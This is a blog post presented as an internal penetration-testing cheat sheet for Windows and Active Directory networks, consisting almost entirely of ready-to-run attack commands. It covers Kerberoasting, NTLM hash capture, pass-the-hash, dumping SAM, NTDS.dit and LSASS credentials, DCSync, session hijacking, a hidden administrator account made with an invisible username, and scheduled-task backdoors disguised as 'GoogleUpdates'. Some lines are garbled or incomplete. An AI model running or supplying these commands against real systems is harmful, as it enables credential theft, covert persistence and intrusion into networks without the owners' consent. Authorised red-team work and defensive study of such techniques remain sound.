The Red Team Guy

The Red Team Guy

A guy who breaks stuff for a living.

Internal Pentest Cheat Sheet

5 minute read

Do. Or do not. There is no try.

This cheatsheet includes a list of commonly used commands during an internal pentest. Feel free to email me or Slack me to add new content to this page.

The internal pentest life cycle includes the following components:

Reconnaissance

Goals for initial internal recon:

  • Identify Domain Controllers
  • Extract domain info
  • Extract all domain users
  • Identify all internal hosts
  • Identify all authentication portals

List Domain Controllers (nltest)

nltest /dclist:<dnsprefix>

List Domain Controllers (nslookup)

nslookup -type=SRV _ldap._tcp.DOMAIN_NAME
nslookup -> set type=all -> _ldap._tcp.dmsdcs.DOMAIN_NAME
nslookup -type=srv _ldap._tcp.dc._msdcs.DOMAIN_NAME

List Domain Controllers via Powershell

New-Object System.DirectoryServices.DirectoryEntry

Create Null Session

net use \\<domainControllerIPAddress>\ipc$ "" /user:""

Create Null Session via enum4linux

enum4linux <domainControllerIPAddress>

DNZ Zone Transfer

nslookup
server <DNS-Server>
set type=any
ls -d <DOMAIN_NAME>

Get Resultant Set of Policy

gpresult /R

Run Goodi

godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe

Get SPN Ticket

Powersploit Module

Import-Module .\powersploit.psm
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat

Kerberoasting

Powerview Module

Import-Module .\powerview.ps1
Invoke-Kerberoast | fl

Rubeus

Rubeus kerberoast

Capturing SMB net-NTLM hashes

Responder

./Responder.py -I eth0 -A

Identify Unconstrained Delegation

Powershell ActiveDirectory Module

Import-Module ActiveDirectory
Get-ADComputer -Filter {(TrustedForDelegation -eq $True)} -Properties TrustedForDelegation,ServicePrincipalName,Description | Out-GridView

Microsoft Technet Module

.\Search-KerbDelegatedAccounts.ps1 | Out-Gridview

Lateral Movement

Goals during lateral movement:

  • Pivot through different systems on the domain using obtained local administrator/domain credential
  • Escalate network access and gain access to isolated networks (e.g. basion hosts, server subnets)
  • Compromise
  • Hijack user sessions on the same hosts/system

Invoke The Hash

Import-module Invoke-TheHash.psd1
Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Invoke-SMBEnum -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -verbose

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt

Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0

Join PC to Domain via Powershell

add-computer -domainname domaincontroller.net -Credential AD\domain-user -restart -force

add-computer -computername srvcore01, srvcore02 -domainname domaincontroller.net -credential AD\domain-user -restart -force

add-computer -computername (get-content servers.txt) -domainname domaincontroller.net -credential AD\domain-user -restart -force

Pass the Hash RDP via Mimikatz

Mimikatz
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"

Join PC to Domain via CMD

netdom /domain:domaincontroller /user:username /password:password member <computer name> /joindomain

netdom /domain:domaincontroller /user:username /password:password member <computer name> /add

Offline Join PC to Domain via CMD

djoin /provision /domain “Windows” /machine “CLIENT-10” /savefile win10blob.txt

Djoin /requestodj /loadfile C:\provision\provision.txt /windowspath %windir% /localos

Privilege Escalation

Goals during escalating privileges:

Replace Sticky Key Binary

copy c:\windows\system32\sethc.exe c:\
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

Post Exploitation

Goals post exploitation:

  • Extract local/domain administrative hash/password to be use for lateral movement
  • Extract domain hashes from NTDS.dit
  • Maintain presistency on the target
  • Identify sensitive files
  • Exploit/Escalate privileges to other domains

Extracting SAM/SYSTEM/SECURITY

reg save hklm\sam c:\temp\sam
reg save hklm\system c:\temp\system
reg save hklm\security c:\temp\security

Extracting NTLM hash via Mimikatz

privilege::debug
lsadump::sam /sam:sam.hiv /system:system.hiv

Extracting NTDS.dit via ntdsutil

ntdsutil
ntdsutil:snapshot
ntdsutil:list all
ntdsutil:create
active instance ntds
snapshot mount 2
snapshot unmount 2
snapshot delete 1

Get current NTDS location

reg.exe query hklm\system\currentcontrolset\services\ntds\parameters

Extracting NTDS.dit via vssadmin

vssadmin list shadows
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\XXXXXXXXXX\windows\ntds\ntds.dit C:one\temp
copy \\?\GLOBALROOT\XXXXXXXXXX\windows\ntds\system C:\temp

DCSync via Mimikatz

lsadump::dcsync /domain:DOMAIN /user:TESTUSER
lsadump::dcsync /domain:DOMAIN /all /csv

DCSync via Powershell

Invoke-DCSync -PWDumpFormat

Dump LSASS memory via Procdump

procdump.exe -accepteula -ma lsass.exe c:\temp\lsass.dmp

Dump LSASS memory via RunDLL in Powershell

$lsassPid = foreach ($process in Get-Process){if ($process.ProcessName -eq "lsass"){$process.id}}  rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $lsassPid  C:\$env:computername.dmp full

Dump LSASS memory via Powershell

Import-Module dump_lsass.ps1
Get-Process lsass | Out-Minidump -DumpFilePath C:\

Dump LSASS memory via Mimikatz

privilege::debug
sekurlsa::logonpasswords

Hijack Window Sessions

query session

tscon <ID> /dest:SessionName

Extract WiFi Profiles/Passwords

netsh wlan show profiles //list all WiFi Profiles

netsh wlan show profile name="profile" key=clear (run as admin) //Extract WiFi Profile cleartext password

netsh wlan export profile %ssidname% folder=c:\temp //Extract WiFi Profile
s

Enabl/Disable RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f //enable RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f //disable RDP

Enabl Remote Powershell

Enable-PSRemoting -Force -SkipNetworkProfileCheck

Extract All Azure Users

install-module AzureAD,AzureADPreview,MSOnline

Connect-MsolService

Get-MsolUser -All | Export-Csv C:\Users.csv

Create Hidden Administrator (Can be copied directly and run on cmd)

chcp 65001
net user ​ P@$$w0rd /add
net localgroup administrators /add

Hide User from login screen

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"[USERNAME]"=dword:00000000

Thin-Client/Kiosk Breakout

Goals for breaking out:

  • Escape from restricted environment/shell
  • Execute commands on local system
  • Gain network foothold on the network
  • Initial reconnaissance phase on the network

Launch Powershell via Javascript

function run() {
	var ieShell = new ActiveXObject ("WScript.Shell");
	ieShell.run("powershell -exec bypass");
}
run()

Run DLL via rundll32

rundll32.exe C:\xxx.dll,Control_RunDLL

RunDLL via netsh

netsh add helper C:\xxx.dll

Useful/Common Oneliners

Create local administrator user

net user username password /add
net localgroup administrator username /add

Create backdoor via schedule task for persistency

SchTasks /Create /SC DAILY /TN “GoogleUpdates1” /TR "%userprofile%\AppData\Local\Temp\Malicious.exe" /ST 09:00 //Everyday at 9AM
SchTasks /Create /SC DAILY /TN “GoogleUpdates2” /TR "%userprofile%\AppData\Local\Temp\Malicious.exe" /ST 17:00 //Everyday at 5AM
SchTasks /Create /SC ONLOGON /TN “GoogleUpdates3” /TR "%userprofile%\AppData\Local\Temp\Malicious.exe" //On Logon

List Windows Credential Manager Passwords

cmdkey /list

Search for filename in Windows with ‘pass’ or ‘cred’

dir /a /S /b *pass* == *cred*

Search for file type in Windows with ‘password’ as filename

findstr /si password *.xml *.ini *.txt

Search password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Mimikatz output parser

cat *|tr -d '\011\015' |awk '/Username/ { user=$0; getline; domain=$0; getline; print user " " domain " " $0}'|grep -v "* LM\|* NTLM\|Microsoft_OC1\|* Password : (null)"|awk '{if (length($12)>2) print $8 "\\" $4 ":" $12}'|sort -u

cat *|tr -d '\011\015' |awk '/Username/ { user=$0; getline; getline; print user " " $0}'|grep -v "* LM\|* NTLM\|Microsoft_OC1\|* Password : (null)"|awk '{if (length($8)>2) print $4 ":" $8}'|sort -u

cat *|tr -d '\011\015' |awk '/Username/ { user=$0; getline; domain=$0; getline; print user " " domain " " $0}'|grep -v "* LM\|* Password\|Microsoft_OC1"|awk '{if (length($12)>2) print $8 "/" $4 "%aad3b435b51404eeaad3b435b51404ee:" $12}'|sort -u

List Installed KB

wmic qfe get Hotfixid

List All users from all groups and domain on workstation

WMIC USERACCOUNT LIST BRIEF

List Firewall rules

netsh advfirewall firewall show rule name=all dir=in type=dynamic
netsh firewall show config

Last updated on 2020-01-03 09:01

Have questions or suggestions? Feel free to email me or ask me on Instagram .

Thanks for reading!

You may also enjoy